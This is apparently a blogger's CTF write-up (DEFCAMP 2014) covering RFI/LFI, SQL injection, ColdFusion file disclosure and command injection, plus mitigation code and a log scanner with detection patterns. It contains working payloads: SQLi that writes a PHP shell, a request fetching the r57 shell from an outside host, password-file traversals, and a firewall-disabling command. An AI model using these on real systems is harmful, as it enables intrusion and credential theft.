Exploring D-CTF Quals 2014's Exploits

Last weekend I played some of the DEFCAMP CTF Quals. It was pretty intense. For (my own) organizational purposes, I made a list of all the technologies and vulnerabilities found in this CTF, some based on my team's game, some based on the CTF write-ups git repo.

Vulnerabilities

Remote File Inclusion and Local File Inclusion Vulnerabilities

In Remote File Inclusion (RFI) an attacker can make the server load and run code hosted elsewhere. RFI can be used to run exploits on both the server and the client side. PHP's include() with a user-controlled path is extremely vulnerable to RFI attacks.

Local File Inclusion (LFI) is similar to RFI, but only files already present on the server can be included. This type of vulnerability is seen in file-upload forms (with improper sanitization).

An example of RFI exploitation is the case where a form only accepts certain extensions (such as JPG or PNG) but the verification is done on the client side. In this case, an attacker can tamper with the HTTP request to send a shell (with a PHP extension, for example). I've shown examples of this attack in the Natas post. There I explained that the trick was to rename a PHP shell to one of these safe extensions.
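The defensive side of both RFI and LFI is to never hand a raw request parameter to include(). The check below is an added example written for this post (not code from the CTF or from any of the applications discussed); PAGES_DIR and the allowed extensions are assumptions, and the function expects the already URL-decoded parameter.

```python
import os
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical directory that includable pages live in (constructed for this example).
PAGES_DIR = "/var/www/pages"
ALLOWED_EXTENSIONS = {".php", ".html"}


def resolve_include(name: str, base_dir: str = PAGES_DIR) -> Optional[str]:
    """Return the absolute path to include, or None if `name` must be rejected.

    `name` is the already URL-decoded request parameter. The check rejects the
    shapes discussed above: remote URLs (RFI), NUL bytes (the %00 truncation
    trick) and any path that escapes base_dir after normalisation (LFI such as
    ../../../../../etc/passwd). The extension is checked server-side, never
    trusted from the client.
    """
    if "\x00" in name:
        return None
    parts = urlsplit(name)
    if parts.scheme or parts.netloc or name.startswith("//"):
        return None  # http://, php://, data: ... are remote or stream includes
    # Treat backslashes as separators too, so ..\..\ cannot slip past posixpath.
    cleaned = name.replace("\\", "/").lstrip("/")
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, cleaned))
    if os.path.commonpath([base, candidate]) != base:
        return None  # traversal outside the allowed directory
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return None  # e.g. shell.gif or passwd: wrong type for an include
    return candidate
```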

TimThumb and LFI

TimThumb is a PHP script for manipulating web images. It was recently discontinued because of security issues.

With TimThumb 1.33, an attacker is able to upload a shell by appending it to an image. All she needs to do is host it on some online subdomain. TimThumb will store this image in a cache folder and generate an MD5 of the full path of the shell. The last step is to perform an LFI attack with the shell in this folder. Check this example of LFI exploitation.

CMS Mini and RFI

CMS Mini is a file-based system to build simple websites. It has several vulnerabilities, such as CSRF, RFI, and XSS.

An example of RFI vulnerability in CMS Mini is explored using curl:

http://[target/IP]/cmsmini/admin/edit.php?path=&name=../../../../../etc/passwd

For more examples of exploits, check 1337day and this exploit-db.

ApPHP and Remote Code Execution

ApPHP is a blog script. It is known for having several vulnerabilities, including remote code execution (RCE). An example of an RCE exploit for ApPHP can be seen here. A good start is to check PHP's disable_functions list to see which functions are still available on the server.

In this CTF, the challenge was to find what was not in that list. For instance, it was possible to use $_POST and $_COOKIE to send strings to functions such as scandir() and file_get_contents():

GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/
Cookie: 0=include

In addition, with a writable directory we can drop a shell on the server (you can use script-kiddie shells like the one from r57shell.net, but in real life, keep in mind that they are super uber backdoored).

Post Request: 0=include/myfile.php
Cookie: 0=http://www.r57shell.net/shell/r57.txt

Gitlist and Remote Command Execution

Gitlist is an application to browse git repositories in a browser. The versions up to 5.0 are known for allowing remote attackers to execute arbitrary commands via the shell, a type of command injection. Exploits for this vulnerability can be seen at hatriot, at packet storm, at 1337day, and at exploit-db.

In this CTF, the following command could be used to look for the flag:

http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60

LibreOffice's Socket Connections

LibreOffice has a binary, soffice.bin, that accepts socket connections on port 2002 (in this CTF, on localhost inside the VPN).

For instance, the unoconv command can be used to convert a file to a format LibreOffice supports. Its -c flag gives the connection string the client uses to reach a LibreOffice instance; the same string is also used in listener mode to tell LibreOffice where to listen.

From the documentation, the default connection string is:

Default connection string is "socket,host=localhost,port=2002;urp;StarOffice.ComponentContext"

Therefore, you can connect to the socket and convert a document (such as /flag.txt) to a PDF, for example:

$ unoconv --connection 'socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext' -f pdf /flag.txt

An example of payload can be seen here.

ColdFusion and Local File Disclosure

ColdFusion is an old web application development platform. It carries its own (interpreted) language, CFM, with a Java backend.

CFM has scripting features like ASP and PHP, and syntax resembling HTML and JavaScript. ColdFusion scripts have the cfm and cfc file extensions. For instance, Adobe ColdFusion 11 and Railo 4.2, the two platforms accepting CFM, were both released at the beginning of 2014.

The problem is that CFM is vulnerable to a variety of attacks, including Local File Disclosure (LFD) and SQL injection (SQLi). Add to this the fact that ColdFusion scripts usually run as highly privileged users, and we have a very vulnerable platform.

SQL Injection (SQLi)

SQL Injection is a classic attack where one injects SQL into a query through user input. Vulnerabilities of this type can be spotted in URLs such as index.php?id=1. I showed some of these exploits in my Natas post.

In this CTF, these were some of the exploits that could be used:

  • List everything in a database, where 0x3a is the hexadecimal code for the colon (:):
UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email),3 FROM cms.users--
  • See the password file content:
UNION ALL SELECT 1,LOAD_FILE("/etc/passwd"),3--
  • Write files and create a PHP shell at URL/shell.php; the shell takes a parameter x with the command to be executed (based on this):
UNION ALL SELECT 1,'<?php header("Content-Type: text/plain;charset=utf-8"); echo system($_GET["x"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php'--

Notice the trailing pair of hyphens --, which tells most database servers that the remainder of the statement is a comment and is not executed (it removes the trailing single quote left over from the modified query). To learn more about how to mitigate SQLi, I recommend OWASP's SQLi Prevention Cheat Sheet and this nice guide for SQLi mitigation by OWASP OWTF.

By the way, it's useful in general to know HTML URL Encoding to craft these URLs.
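To make the mitigation concrete, here is an added example (not code from the CTF or from the OWASP guides) that runs the index.php?id=1 pattern against a constructed in-memory SQLite database, first with string concatenation and then with parameter binding. The UNION payload is the one from the list above, adapted from MySQL's concat(..., 0x3a, ...) to SQLite's || operator; the table names and rows are made up for the demo.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts(id INTEGER, title TEXT, body TEXT);
        CREATE TABLE users(username TEXT, password TEXT, email TEXT);
        INSERT INTO posts VALUES (1, 'Hello', 'first post');
        INSERT INTO users VALUES ('admin', 'hash-placeholder', 'admin@example.test');
    """)
    return conn


def fetch_post_vulnerable(conn, post_id: str):
    # The index.php?id=1 pattern: the parameter is pasted straight into the SQL text,
    # so "1 UNION ALL SELECT ..." becomes part of the statement.
    sql = "SELECT id, title, body FROM posts WHERE id = " + post_id
    return conn.execute(sql).fetchall()


def fetch_post_safe(conn, post_id: str):
    # Parameter binding: the value travels separately from the statement and can
    # never change its structure; a non-numeric id simply matches no row.
    return conn.execute(
        "SELECT id, title, body FROM posts WHERE id = ?", (post_id,)
    ).fetchall()


# The UNION payload from the write-up, adapted from MySQL's concat(..., 0x3a, ...)
# to SQLite's || operator. The trailing -- comments out the rest of the original query.
PAYLOAD = "1 UNION ALL SELECT 1, username || ':' || password || ':' || email, 3 FROM users--"


def run_demo() -> dict:
    conn = build_demo_db()
    return {
        "vuln_normal": fetch_post_vulnerable(conn, "1"),
        "vuln_payload": fetch_post_vulnerable(conn, PAYLOAD),  # leaks the users table
        "safe_normal": fetch_post_safe(conn, "1"),
        "safe_payload": fetch_post_safe(conn, PAYLOAD),        # returns []
    }
```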

CesarFTP 0.99g and Buffer Overflow

CesarFTP 0.99g is an easy-to-use FTP server. It is also known for having several vulnerabilities, including buffer overflow.

For example, see this exploit for Metasploit from exploit-db (or an older one here).

File Disclosure of Password Hashes

This vulnerability provides a 30-second window in the Administration panel, which can be used to write a shell. The main idea is a directory traversal to password.properties, whose contents can be used to log in to the server.

Ingredients of this attack are:

  • The target must have the ColdFusion administrator available, which by default is mapped to CFIDE/administrator/enter.cfm. If it returns a 500, switch to HTTPS.

  • At the ColdFusion administrator, verify the version, and then use one of these injections:

(Version 6): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

(Version 7): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

(Version 8): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

(All versions): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
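From the defender's side, the request shapes in this write-up (the CMS Mini ../../etc/passwd traversal, the Gitlist backtick injection, and the ColdFusion locale traversal with %00) are all visible in a web server's access log. The scanner below is an added example, not part of the original post: the log lines are constructed in common log format with made-up client addresses, and the rules are applied to the percent-decoded request path so encoded variants do not slip through.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format) that replay the request
# shapes from this write-up plus two benign requests. Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Oct/2014:10:00:01 +0000] "GET /cmsmini/admin/edit.php?path=&name=../../../../../etc/passwd HTTP/1.1" 200 1720
10.0.0.5 - - [19/Oct/2014:10:00:02 +0000] "GET /gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60 HTTP/1.1" 200 903
10.0.0.5 - - [19/Oct/2014:10:00:03 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 512
10.0.0.9 - - [19/Oct/2014:10:00:04 +0000] "GET /cmsmini/index.php?page=about HTTP/1.1" 200 2210
10.0.0.9 - - [19/Oct/2014:10:00:05 +0000] "GET /gitlist/redis/blame/unstable/README.md HTTP/1.1" 200 1543
"""

# Client address, timestamp, method and the raw (still percent-encoded) request path.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')

# Each rule is (name, regex applied to the percent-decoded path).
RULES = [
    ("path-traversal", re.compile(r"(\.\.[/\\]){2,}")),        # ../../ or ..\..\
    ("null-byte-truncation", re.compile("\x00")),              # %00 after decoding
    ("shell-metachar-in-path", re.compile(r"[`$|]")),          # %60 backtick etc.
    ("sensitive-file", re.compile(r"/etc/passwd|password\.properties", re.I)),
]


def scan_log(text: str):
    """Return (client_ip, raw_path, [matched rule names]) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        decoded = unquote(m["path"])  # %2e, %00 and %60 all become literal characters
        matched = [name for name, rx in RULES if rx.search(decoded)]
        if matched:
            hits.append((m["ip"], m["path"], matched))
    return hits
```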

Useful Tools

Vulnerability Scanners

Vulnerability scanners can be useful for several problems. For instance, for a PHP static source code analyser, we can use RIPS.

In this CTF we had to scan for Heartbleed, and we used this script.

Scapy

Scapy is a Python lib for crafting packets. It can be useful for problems such as port knocking. For illustration, check this example from PHD CTF 2011 and this from ASIS CTF 2014. Check this project too.

Steganography

One of the questions had a reference to the paranoia.jar tool, which hides text in an image file using 128-bit AES encryption.

To run the tool (after downloading it) just do:

java -jar paranoia.jar

HTTP/HTTPS Request Tampering

Very useful for the RFI problems (but not limited to them):

  • Tamper Data: view and modify HTTP/HTTPS headers.
  • Burp: a Java application to secure or penetrate web applications.

Wireshark

At some point I'm going to dedicate an entire post for Wireshark, but for this CTF the important things to know were:

  • Look for POST requests:
http.request.method == "POST"
  • Submit the found data (same username, nonce, and password) with the command:
$ curl --data 'user=manager&nonce=7413734ab666ce02cf27c9862c96a8e7&pass=3ecd6317a873b18e7dde351ac094ee3b' HOST

Exif Data Extractor

ExifTool is used for reading, writing, and manipulating image metadata:

$ tar -xf Image-ExifTool-9.74.tar.gz
$ cd Image-ExifTool-9.74/
$ perl Makefile.PL
$ make test
$ sudo make install
$ exiftool IMAGEFILE

MD5 Lookups

Several hashes in this CTF needed to be searched. Google in general does a good job, but here are some specific websites: hash-killer and md5this.

In the Shell

  • Hexadecimal decoders are essential. You can use Python 2's hex codec:
$ python -c 'print "2f722f6e6574736563".decode("hex")'
/r/netsec

or command line xxd:

$ yum install vim-common
$ xxd -r -p <<< 2f722f6e6574736563
/r/netsec
  • Base64 decoders are also essential:
$ base64 --decode <<< BASE64STRING > OUTPUT
  • nmap, obviously. You can use it in Python scripts, using the subprocess library:
import subprocess  # base_URL holds the target host and is set elsewhere in the script
print("[*] Scanning for open ports using nmap")
subprocess.call("nmap -sS -sV -T4 -p 22-2048 " + base_URL, shell=True)
  • tee is nice to store and view the output of another command. It can be very useful with curl. A simple example:
$ ls | tee file
  • chattr is used to change the file attributes on a Linux file system. For example, chattr +i on a file makes it immutable, so it cannot be modified or removed (useful for zombie process hunting).

  • nm is useful for listing symbols from object files.

  • md5 hashing is used all the time:

$ echo -n password | md5sum
5f4dcc3b5aa765d61d8327deb882cf99
  • You might want to append a shell code to an image (for example, a GIF file):
$ cat PHP-shell.php >> fig.gif
  • Now a special one: Windows! One of the trivia questions in this CTF asked how to disable the Windows XP firewall from the command line:
netsh firewall set opmode mode=DISABLE

That's it. Hack all the things!